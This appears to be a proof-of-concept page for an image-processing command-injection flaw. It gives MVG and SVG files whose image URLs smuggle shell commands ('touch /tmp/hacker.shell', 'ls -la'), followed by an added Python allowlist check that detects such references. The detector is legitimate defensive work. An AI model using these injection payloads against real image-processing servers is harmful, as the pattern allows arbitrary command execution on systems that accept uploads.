exploit.mvg
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg;"|touch "/tmp/hacker.shell)'
pop graphic-context
exploit.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="640px" height="480px" version="1.1"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink=
"http://www.w3.org/1999/xlink">
<image xlink:href="https://example.com/image.jpg"|ls "-la"
x="0" y="0" height="640px" width="480px"/>
</svg>
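A pre-processing check for the two files above, as an added example that is not part of the original page: it extracts every `url(...)` and `href` reference from an upload and rejects any that falls outside a strict character allowlist, which catches the quote-and-pipe sequences in both files. The function name, the allowlist and the sample strings (constructed from the files above) are assumptions made for this illustration.

```python
import html
import re

# Allowlist for a reference: an http(s) URL or a fragment such as "#grad1".
# Quotes, pipes, backticks, spaces, ';', '$' and parentheses are excluded.
SAFE_REF = re.compile(r"(?:https?://|#)[A-Za-z0-9._~:/?#@&=%+-]+")

# MVG / CSS style reference: everything between "url(" and the next ")".
URL_FUNC = re.compile(r"url\(([^)\n]*)\)")

# SVG href / xlink:href attribute. The closing quote must be followed by
# whitespace, "/" or ">", so a value that contains stray quotes is captured
# whole instead of being cut at the first quote.
HREF_ATTR = re.compile(r"""\b(?:xlink:)?href\s*=\s*(["'])(.*?)\1(?=[\s/>]|$)""", re.S)


def unsafe_references(text):
    """Return (kind, value) for every reference that fails the allowlist."""
    findings = []
    for kind, pattern, group in (("url()", URL_FUNC, 1), ("href", HREF_ATTR, 2)):
        for match in pattern.finditer(text):
            # Decode entities such as &quot; before checking the value.
            value = html.unescape(match.group(group))
            if not SAFE_REF.fullmatch(value):
                findings.append((kind, value))
    return findings


# Constructed samples: the reference lines from the two files above,
# plus a benign pair that must pass.
MVG_SAMPLE = """push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg;"|touch "/tmp/hacker.shell)'
pop graphic-context
"""
SVG_SAMPLE = ('<image xlink:href="https://example.com/image.jpg"|ls "-la" '
              'x="0" y="0" height="640px" width="480px"/>')
BENIGN = ('<image xlink:href="https://example.com/image.jpg" x="0" y="0"/>\n'
          "fill 'url(#grad1)'")

if __name__ == "__main__":
    for name, sample in (("mvg", MVG_SAMPLE), ("svg", SVG_SAMPLE), ("benign", BENIGN)):
        hits = unsafe_references(sample)
        print(name, "REJECT" if hits else "ok", hits)
```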
Online video: https://www.youtube.com/watch?v=yA8LzYQ3DMc